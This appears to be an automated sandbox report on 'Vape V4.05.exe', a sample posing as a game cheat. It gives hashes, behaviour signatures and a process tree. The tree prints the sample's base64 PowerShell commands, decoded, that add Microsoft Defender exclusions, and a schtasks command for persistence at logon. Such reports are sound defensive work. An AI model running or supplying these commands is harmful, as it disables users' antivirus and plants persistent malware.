Analysis
  max time kernel: 145s
  max time network: 147s
  platform: windows10-2004_x64
  resource: win10v2004-en-20220113
  submitted: 17-02-2022 14:46

Static task: static1
Behavioral task: behavioral1
Sample: Vape V4.05.exe
Resource: win7-en-20211208

General
  Target: Vape V4.05.exe
  Size: 13.9MB
  MD5: b26285219a7d20505e4a8628fe4092f2
  SHA1: 9b0109eb2e0fd5a401820262fe9a8272600685b1
  SHA256: 829e4cdc3b9823f5967f4d84c0a5f0e654e95760d09eb5de9c9ad91544dc9478
  SHA512: da09d8e018d77c5cd4d56afc03b4228fdf5a9dbca0294c41f2808a7f106ad118253b895db87f6f6461b11830401e07e304c92572a0678bdb390e5e9b67cbe7d3
Malware Config
Signatures
Suspicious use of NtCreateProcessExOtherParentProcess (1 IoC)
Processes:
  description            | pid  | process      | target process
  PID 1700 created 4912  | 1700 | WerFault.exe | Vape_V4.exe

(YARA match, signature title not present in the extracted report)
Processes:
  resource                                                                     | yara_rule
  behavioral2/memory/4840-130-0x0000000000400000-0x00000000015DC000-memory.dmp | evasion
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

Executes dropped EXE (4 IoCs)
Processes:
  pid  | process
  1944 | syn conhost.exe
  4912 | Vape_V4.exe
  3224 | services32.exe
  1784 | sihost64.exe
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description       | ioc                                                                  | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion      | Vape_V4.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion       | Vape_V4.exe

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up the country code configured in the registry, likely a geofence.
Processes:
  description       | ioc                                                                                                        | process
  Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | Vape_V4.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | services32.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | Vape V4.05.exe
(YARA match, signature title not present in the extracted report)
Processes:
  resource                                       | yara_rule
  C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe  | themida
  C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe  | themida

Checks whether UAC is enabled (signature title taken from the process tree below; the EnableLUA query is its IoC)
Processes:
  description       | ioc                                                                              | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Vape_V4.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (3 IoCs)
Processes:
  pid  | process
  4840 | Vape V4.05.exe
  4840 | Vape V4.05.exe
  4912 | Vape_V4.exe

Drops file in Windows directory (8 IoCs)
Processes:
  description                   | ioc                                                        | process
  File opened for modification  | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk     | svchost.exe
  File opened for modification  | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log     | svchost.exe
  File opened for modification  | C:\Windows\SoftwareDistribution\DataStore\DataStore.edb    | svchost.exe
  File opened for modification  | C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm    | svchost.exe
  File opened for modification  | C:\Windows\SoftwareDistribution\ReportingEvents.log        | svchost.exe
  File opened for modification  | C:\Windows\Logs\CBS\CBS.log                                | TiWorker.exe
  File opened for modification  | C:\Windows\WinSxS\pending.xml                              | TiWorker.exe
  File opened for modification  | C:\Windows\WindowsUpdate.log                               | svchost.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (1 IoC)
Processes:
  pid  | pid_target | process      | target process
  2728 | 4912       | WerFault.exe | Vape_V4.exe
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description       | ioc                                                                              | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
  Key opened        | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                     | WerFault.exe

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Enumerates system info in registry (2 TTPs, 2 IoCs)
Processes:
  description       | ioc                                                        | process
  Key opened        | \REGISTRY\MACHINE\Hardware\Description\System\BIOS         | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe

Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes:
  pid  | process
  4780 | powershell.exe
  4912 | Vape_V4.exe
  4912 | Vape_V4.exe
  4912 | Vape_V4.exe
  4912 | Vape_V4.exe
  4780 | powershell.exe
  2728 | WerFault.exe
  2728 | WerFault.exe
  3776 | powershell.exe
  3776 | powershell.exe
  1944 | syn conhost.exe
  2416 | powershell.exe
  2416 | powershell.exe
  2416 | powershell.exe
  1908 | powershell.exe
  1908 | powershell.exe
  1908 | powershell.exe
  3224 | services32.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
  description                       | pid  | process
  Token: SeDebugPrivilege           | 4780 | powershell.exe
  Token: SeDebugPrivilege           | 4912 | Vape_V4.exe
  Token: SeDebugPrivilege           | 3776 | powershell.exe
  Token: SeDebugPrivilege           | 1944 | syn conhost.exe
  Token: SeShutdownPrivilege        | 1496 | svchost.exe
  Token: SeCreatePagefilePrivilege  | 1496 | svchost.exe
  Token: SeShutdownPrivilege        | 1496 | svchost.exe
  Token: SeCreatePagefilePrivilege  | 1496 | svchost.exe
  Token: SeShutdownPrivilege        | 1496 | svchost.exe
  Token: SeCreatePagefilePrivilege  | 1496 | svchost.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeDebugPrivilege           | 2416 | powershell.exe
  Token: SeDebugPrivilege           | 1908 | powershell.exe
  Token: SeDebugPrivilege           | 3224 | services32.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
  Token: SeBackupPrivilege          | 4500 | TiWorker.exe
  Token: SeRestorePrivilege         | 4500 | TiWorker.exe
  Token: SeSecurityPrivilege        | 4500 | TiWorker.exe
Suspicious use of SetWindowsHookEx (1 IoC)
Processes:
  pid  | process
  4840 | Vape V4.05.exe

Suspicious use of WriteProcessMemory (28 IoCs)
Processes:
  description                       | pid  | process          | target process
  PID 4840 wrote to memory of 1944  | 4840 | Vape V4.05.exe   | syn conhost.exe
  PID 4840 wrote to memory of 1944  | 4840 | Vape V4.05.exe   | syn conhost.exe
  PID 4840 wrote to memory of 4912  | 4840 | Vape V4.05.exe   | Vape_V4.exe
  PID 4840 wrote to memory of 4912  | 4840 | Vape V4.05.exe   | Vape_V4.exe
  PID 1944 wrote to memory of 2284  | 1944 | syn conhost.exe  | cmd.exe
  PID 1944 wrote to memory of 2284  | 1944 | syn conhost.exe  | cmd.exe
  PID 2284 wrote to memory of 4780  | 2284 | cmd.exe          | powershell.exe
  PID 2284 wrote to memory of 4780  | 2284 | cmd.exe          | powershell.exe
  PID 1700 wrote to memory of 4912  | 1700 | WerFault.exe     | Vape_V4.exe
  PID 1700 wrote to memory of 4912  | 1700 | WerFault.exe     | Vape_V4.exe
  PID 2284 wrote to memory of 3776  | 2284 | cmd.exe          | powershell.exe
  PID 2284 wrote to memory of 3776  | 2284 | cmd.exe          | powershell.exe
  PID 1944 wrote to memory of 5112  | 1944 | syn conhost.exe  | cmd.exe
  PID 1944 wrote to memory of 5112  | 1944 | syn conhost.exe  | cmd.exe
  PID 5112 wrote to memory of 3692  | 5112 | cmd.exe          | schtasks.exe
  PID 5112 wrote to memory of 3692  | 5112 | cmd.exe          | schtasks.exe
  PID 1944 wrote to memory of 2776  | 1944 | syn conhost.exe  | cmd.exe
  PID 1944 wrote to memory of 2776  | 1944 | syn conhost.exe  | cmd.exe
  PID 2776 wrote to memory of 3224  | 2776 | cmd.exe          | services32.exe
  PID 2776 wrote to memory of 3224  | 2776 | cmd.exe          | services32.exe
  PID 3224 wrote to memory of 2716  | 3224 | services32.exe   | cmd.exe
  PID 3224 wrote to memory of 2716  | 3224 | services32.exe   | cmd.exe
  PID 2716 wrote to memory of 2416  | 2716 | cmd.exe          | powershell.exe
  PID 2716 wrote to memory of 2416  | 2716 | cmd.exe          | powershell.exe
  PID 2716 wrote to memory of 1908  | 2716 | cmd.exe          | powershell.exe
  PID 2716 wrote to memory of 1908  | 2716 | cmd.exe          | powershell.exe
  PID 3224 wrote to memory of 1784  | 3224 | services32.exe   | sihost64.exe
  PID 3224 wrote to memory of 1784  | 3224 | services32.exe   | sihost64.exe
Processes
(tree depth shown in brackets; the two -EncodedCommand payloads are base64 of UTF-16LE text and are decoded inline where they first appear)

[1] C:\Users\Admin\AppData\Local\Temp\Vape V4.05.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\Vape V4.05.exe"
    - Checks computer location settings
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    [2] C:\Users\Admin\AppData\Local\Temp\syn conhost.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\syn conhost.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SYSTEM32\cmd.exe
            command line: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            decoded (first payload):  Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
            decoded (second payload): Add-MpPreference -ExclusionExtension @('exe','dll') -Force
            (both add Microsoft Defender exclusions: the user profile and system drive paths, and all .exe/.dll files)
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                command line: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                command line: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\SYSTEM32\cmd.exe
            command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe"
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\system32\schtasks.exe
                command line: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe"
                - Creates scheduled task(s)

        [3] C:\Windows\SYSTEM32\cmd.exe
            command line: "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe"
            - Suspicious use of WriteProcessMemory

            [4] C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe
                command line: C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe
                - Executes dropped EXE
                - Checks computer location settings
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of WriteProcessMemory

                [5] C:\Windows\system32\cmd.exe
                    command line: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                    (same two Add-MpPreference payloads as at depth [3] above)
                    - Suspicious use of WriteProcessMemory

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        command line: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken

                    [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        command line: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of AdjustPrivilegeToken

                [5] C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
                    command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
                    - Executes dropped EXE

    [2] C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe"
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Checks computer location settings
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\system32\WerFault.exe
            command line: C:\Windows\system32\WerFault.exe -u -p 4912 -s 680
            - Program crash
            - Checks processor information in registry
            - Enumerates system info in registry
            - Suspicious behavior: EnumeratesProcesses

[1] C:\Windows\system32\WerFault.exe
    command line: C:\Windows\system32\WerFault.exe -pss -s 408 -p 4912 -ip 4912
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Suspicious use of WriteProcessMemory

[1] C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
    command line: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5:    d85ba6ff808d9e5444a4b369f5bc2730
  SHA1:   31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5:    2e907f77659a6601fcc408274894da2e
  SHA1:   9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
  SHA256: 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
  SHA512: 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5:    e5663972c1caaba7088048911c758bf3
  SHA1:   3462dea0f9c2c16a9c3afdaef8bbb1f753c1c198
  SHA256: 9f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e
  SHA512: ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5:    51cf8df21f531e31f7740b4ec487a48a
  SHA1:   40c6a73b22d71625a62df109aefc92a5f9b9d13e
  SHA256: 263d9b98a897d1d66da4832af640c4bf5ab0ae91125ba12243453dfe714f3d0d
  SHA512: 57a85461f6ea96b26a8b53d3a9cca18543e4ddbe996e8f412fc4cf7cf6e9ffe558c96da7b322a42f18bef62020e65aee119bed6102f75e2f605df09b02ec6368

C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe
  MD5:    7407fd99ee1940051b4f543656ea9b0a
  SHA1:   7149b25db501b75111ac77fe4bcfe6915058757a
  SHA256: bef628b23396d36849beac1bf633859d02f82ae9dc877281862b7e9e85148ecd
  SHA512: 804a257e128f54d5febaca7424f308403e092f773119075270b89d8721e9cc91e3b7adc402ad9a9fbb252b5af250745d2f6a34f523f30b1f08c212aea0e5b75d
C:\Users\Admin\AppData\Local\Temp\syn conhost.exe
  MD5:    8d219ec4b3221c9e18f05d663b245a7b
  SHA1:   08f956878fa7144d425a7be049d172ce743424d4
  SHA256: 15090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8
  SHA512: db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
  MD5:    e83a53213ee5593da07c3da2fa6e53c4
  SHA1:   230cd2f92bfcb38a727209a0ed14272aec969a59
  SHA256: 8bb79f322069a21f06ceb8916aef6dddeb7934c25ef35b8a38b918491d648c66
  SHA512: dd667fc2fcbe26547d16cc9a6ce18e55c57c62cee1bd365ebef17e88d0f0694bec69921179433b06fa89569d7b52f064b8ba0cc8b2fab3e13cb4b089b9b3e1dc
C:\Users\Admin\AppData\Roaming\Microsoft\services32.exe (same hashes as syn conhost.exe)
  MD5:    8d219ec4b3221c9e18f05d663b245a7b
  SHA1:   08f956878fa7144d425a7be049d172ce743424d4
  SHA256: 15090f836230310f9074d7a296e428f70a2335f7668e844757244930a55f0ff8
  SHA512: db1e78181e9a3dfff5d43e3fd398534c227fea318e83919cad819c374b744677f83e95733dc5c3633f1baccea503d86baf8ee22f9f7c3ccc6e581d5aef42b80f
Memory dumps (resource, Filesize)
  memory/1496-152-0x000001EF61D70000-0x000001EF61D80000-memory.dmp  64KB
  memory/1496-154-0x000001EF649F0000-0x000001EF649F4000-memory.dmp  16KB
  memory/1496-153-0x000001EF62320000-0x000001EF62330000-memory.dmp  64KB
  memory/1784-169-0x000000001DB80000-0x000000001DB82000-memory.dmp  8KB
  memory/1784-167-0x0000000000A80000-0x0000000000A86000-memory.dmp  24KB
  memory/1784-168-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmp  8KB
  memory/1944-137-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmp  8KB
  memory/1944-139-0x000000001DD30000-0x000000001DD32000-memory.dmp  8KB
  memory/1944-134-0x0000000001450000-0x0000000001462000-memory.dmp  72KB
  memory/1944-133-0x0000000000940000-0x0000000000B2E000-memory.dmp  1.9MB
  memory/2416-161-0x000002343FAA0000-0x000002343FAA2000-memory.dmp  8KB
  memory/2416-160-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmp  8KB
  memory/2416-162-0x000002343FAA3000-0x000002343FAA5000-memory.dmp  8KB
  memory/2416-163-0x000002343FAA6000-0x000002343FAA8000-memory.dmp  8KB
  memory/3224-158-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmp  8KB
  memory/3224-159-0x000000001E130000-0x000000001E132000-memory.dmp  8KB
  memory/3776-150-0x000001CCE5126000-0x000001CCE5128000-memory.dmp  8KB
  memory/3776-151-0x000001CCE5128000-0x000001CCE5129000-memory.dmp  4KB
  memory/3776-148-0x000001CCE5120000-0x000001CCE5122000-memory.dmp  8KB
  memory/3776-149-0x000001CCE5123000-0x000001CCE5125000-memory.dmp  8KB
  memory/3776-147-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmp  8KB
  memory/4780-144-0x000001FB4C876000-0x000001FB4C878000-memory.dmp  8KB
  memory/4780-143-0x000001FB4C873000-0x000001FB4C875000-memory.dmp  8KB
  memory/4780-142-0x000001FB4C870000-0x000001FB4C872000-memory.dmp  8KB
  memory/4780-141-0x00007FFBFF8E3000-0x00007FFBFF8E5000-memory.dmp  8KB
  memory/4780-138-0x000001FB4C7E0000-0x000001FB4C802000-memory.dmp  136KB
  memory/4840-130-0x0000000000400000-0x00000000015DC000-memory.dmp  17.9MB
  memory/4912-140-0x00007FFC20410000-0x00007FFC20412000-memory.dmp  8KB